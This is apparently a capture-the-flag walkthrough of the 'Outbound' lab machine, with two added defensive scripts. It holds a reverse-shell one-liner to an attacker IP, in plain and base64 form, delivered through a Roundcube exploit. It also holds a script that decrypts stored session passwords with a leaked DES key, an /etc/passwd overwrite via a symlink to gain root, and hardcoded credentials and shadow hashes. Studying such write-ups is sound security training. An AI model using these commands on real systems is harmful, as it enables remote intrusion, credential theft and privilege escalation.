Basic information

As is common in real life pentests, you will start the Outbound box with credentials for the following account tyler / LhKL1o9Nm3X2

Port scan

Only ports 22 and 80 are open:

```text
$ nmap -sC -sV -Pn 10.10.11.77
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-18 21:02 JST
Nmap scan report for 10.10.11.77
Host is up (0.18s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
|_http-title: Did not follow redirect to http://mail.outbound.htb/
|_http-server-header: nginx/1.24.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.92 seconds
```

80

The redirect target needs a hosts entry:

```text
10.10.11.77 outbound.htb mail.outbound.htb
```

The site is a Roundcube Webmail instance:

Roundcube

The supplied credentials log in successfully; the version is Roundcube Webmail 1.6.10:

shell

Getting a shell as www-data:

```bash
/bin/bash -i >& /dev/tcp/10.10.14.22/4444 0>&1
L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjIyLzQ0NDQgMD4mMQo=

php CVE-2025-49113.php http://mail.outbound.htb/ tyler LhKL1o9Nm3X2 "echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE0LjIyLzQ0NDQgMD4mMQo= | base64 -d | bash"
```

The shell lands inside a Docker container (172.17.0.2).

mysql to jacob

Routine browsing of the web root turns up the MySQL credentials and the DES key:

```php
www-data@mail:/var/www/html/roundcube/config$ cat config.inc.php


$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';
```
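As a defender-side counterpart to this finding (an added example, not code from the original writeup): a small parser that pulls the string settings out of a Roundcube config.inc.php and flags two weaknesses at once, a des_key that is still the sample value Roundcube ships in its defaults, and database credentials embedded in the DSN. The function names, the regex and the sample config text are assumptions constructed for this example; the default-key value is the one from Roundcube's shipped defaults.

```python
import re
from urllib.parse import urlparse

# Roundcube ships this sample value in its default configuration. An install that
# still uses it lets anyone who can read the session table recover stored passwords.
ROUNDCUBE_DEFAULT_DES_KEY = "rcmail-!24ByteDESkey*Str"

# Constructed config excerpt, modelled on the config.inc.php seen on the box.
SAMPLE_CONFIG = r"""<?php
$config['db_dsnw'] = 'mysql://roundcube:RCDBPass2025@localhost/roundcube';
$config['des_key'] = 'rcmail-!24ByteDESkey*Str';
$config['support_url'] = '';
"""

# Matches $config['name'] = 'value'; or "value"; (single-line string settings only)
_ASSIGN_RE = re.compile(
    r"""\$config\[\s*['"](?P<name>\w+)['"]\s*\]\s*=\s*(?P<q>['"])(?P<value>.*?)(?P=q)\s*;"""
)


def parse_config(text):
    """Return the string-valued settings of a Roundcube config.inc.php as a dict."""
    return {m.group("name"): m.group("value") for m in _ASSIGN_RE.finditer(text)}


def audit_config(settings):
    """Return a list of findings (empty when the checked settings look sane)."""
    findings = []
    key = settings.get("des_key", "")
    if key == ROUNDCUBE_DEFAULT_DES_KEY:
        findings.append("des_key is Roundcube's sample default; session passwords are "
                        "decryptable by anyone who knows the public default")
    elif len(key.encode()) != 24:
        # Roundcube's default cipher is DES-EDE3-CBC, which needs a 24-byte key.
        findings.append(f"des_key is {len(key.encode())} bytes; 3DES needs a 24-byte key")
    dsn = settings.get("db_dsnw", "")
    if dsn and urlparse(dsn).password:
        findings.append(f"db_dsnw embeds the password of DB user "
                        f"'{urlparse(dsn).username}' in the config file")
    return findings


if __name__ == "__main__":
    for finding in audit_config(parse_config(SAMPLE_CONFIG)):
        print("[!]", finding)
```

Run against the sample it reports both problems; point `parse_config` at a real config file's contents to audit an installation. The key check is the same one that turns the next step of this writeup (decrypting the session) from a secret-dependent operation into a public one.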

From MySQL we can pull jacob's session row, which contains his DES-encrypted credentials:

```bash
mysql -u roundcube -pRCDBPass2025 -e 'use roundcube;select * from session;'

# after base64-decoding the session blob, it contains:
password|s:32:"L7Rv00A8TuwJAr67kITxxcSgnIk25Am/"
auth_secret|s:26:"DpYqv6maI9HxDL5GhcCd8JaQQW"
request_token|s:32:"TIsOaABA1zHSXZOBpH6up5XFyayNRHaw"
```

A quick search turns up the decryption method:

Alternatively, a ready-made script by someone else recovers jacob's password:

```text
$ python3 decrypt.py
[+] Decrypted password: 595mO8DmwGeD
```

decrypt.py

```python
from base64 import b64decode
from Crypto.Cipher import DES3  # pycryptodome

# --- Inputs ---
key = b'rcmail-!24ByteDESkey*Str'  # 24-byte DES-EDE3 key (Roundcube's des_key)

# Values lifted from the session blob (base64). Only 'password' is a
# Roundcube-encrypted value; the other two are session tokens and will
# not decrypt to anything meaningful.
data = {
    'password': 'L7Rv00A8TuwJAr67kITxxcSgnIk25Am/',
    'auth_secret': 'DpYqv6maI9HxDL5GhcCd8JaQQW',
    'request_token': 'TIsOaABA1zHSXZOBpH6up5XFyayNRHaw'
}


def decrypt_des3_cbc(value, key):
    """Roundcube stores base64(IV || 3DES-CBC ciphertext); the IV is the first block."""
    try:
        raw = b64decode(value)
        iv = raw[:8]            # 8-byte IV prepended to the ciphertext
        cipher_text = raw[8:]
        cipher = DES3.new(key, DES3.MODE_CBC, iv)
        decrypted = cipher.decrypt(cipher_text)
        # Strip null bytes and the last padding byte (mimics PHP rtrim + substr)
        decrypted = decrypted.rstrip(b'\x00')[:-1]
        return decrypted.decode(errors='replace')
    except Exception as e:
        return f"[ERROR] {e}"


# Decrypt all values
for k, v in data.items():
    result = decrypt_des3_cbc(v, key)
    print(f"[+] Decrypted {k}: {result}")
```

jacob to user

This password does not yet allow SSH into the host, but it does let us switch to jacob inside the container, and his mailbox yields a second password:

```text
jacob@mail:/var/mail$ cat jacob

gY4Wr3a1evp4
```

user flag

The new password allows SSH into the external host:

Privilege escalation information

jacob may run a specific below command via sudo, and a search reveals a known vulnerability in below:

So the idea is to write a file through a symlink, for example overwriting the passwd file to create a new user.

Privilege escalation & root flag

The whole process, run in quick succession:

```bash
# new user entry
echo "miao::0:0:miao:/root:/bin/bash" > /tmp/miao

# remove the original log file
rm -rf /var/log/below/error_root.log

# symlink
ln -s /etc/passwd /var/log/below/error_root.log

# run below
sudo /usr/bin/below

# overwrite the symlink target (the passwd file) with our user entry
cp /tmp/miao /var/log/below/error_root.log && su miao
```
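As a defender-side counterpart to the procedure above (an added example, not part of the original writeup): a check that walks a log directory and reports any symlink whose target resolves outside that directory, which is exactly the precondition this escalation relies on. The function names and the temporary demo layout are assumptions constructed for this example; the demo never touches /etc or /var/log, and pointing `find_escaping_symlinks` at a real /var/log/below is left to the reader.

```python
import os
import tempfile


def find_escaping_symlinks(log_dir):
    """Return (link_path, resolved_target) for every symlink directly inside
    log_dir whose target resolves outside log_dir. A privileged process that
    (re)opens its log path without O_NOFOLLOW would write through such a link."""
    root = os.path.realpath(log_dir)
    hits = []
    for name in sorted(os.listdir(root)):
        path = os.path.join(root, name)
        if not os.path.islink(path):
            continue
        target = os.path.realpath(path)
        if os.path.commonpath([root, target]) != root:
            hits.append((path, target))
    return hits


def build_demo_dir():
    """Construct a throwaway layout that mimics /var/log/below after a link has
    been planted. Returns (log_dir, realpath of the outside target). Everything
    lives in temp directories; nothing touches /etc or /var/log."""
    outside = tempfile.mkdtemp(prefix="outside-")
    target = os.path.join(outside, "passwd")   # constructed stand-in for /etc/passwd
    with open(target, "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
    log_dir = tempfile.mkdtemp(prefix="below-demo-")
    with open(os.path.join(log_dir, "below.log"), "w") as f:
        f.write("ordinary log line\n")
    # A link that stays inside the log directory is not reported.
    os.symlink(os.path.join(log_dir, "below.log"), os.path.join(log_dir, "rotated.log"))
    # A link that escapes the directory is the pattern used on the box.
    os.symlink(target, os.path.join(log_dir, "error_root.log"))
    return log_dir, os.path.realpath(target)


if __name__ == "__main__":
    demo_dir, _ = build_demo_dir()
    for link, dest in find_escaping_symlinks(demo_dir):
        print(f"[!] {link} -> {dest}")
```

Detection of planted links is a stop-gap; the durable fixes are for the privileged writer to open its log without following symlinks and for the log directory not to be writable by the account that is allowed to run the tool via sudo.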

shadow

```text
root:$y$j9T$pYysWAL0lX2oSXNpBeXs81$yinIBrOJnhJj7viI.GiorNEgZFyIewJbS3qnjgXth16:20247:0:99999:7:::
mel:$y$j9T$5lR6zOH0Y8G/9ZDhogu2o0$9..CpGSBi06uovpNhGjqaMhPkc3Yw/svG9T3bSBoeS2:20247:0:99999:7:::
tyler:$y$j9T$t1QDz.OaqfevjpnRfQrRY.$jJwx2.H.OkiHiW8T0f.3A1qS5ZfA7.nmwU3TE1otfb.:20247:0:99999:7:::
jacob:$y$j9T$5JYw1WIG1mlmMdj6BrGVV/$yimg6djeBwfHAaDiOPoU0le/aURm6fRaG.DXzBkmmmA:20247:0:99999:7:::
```

References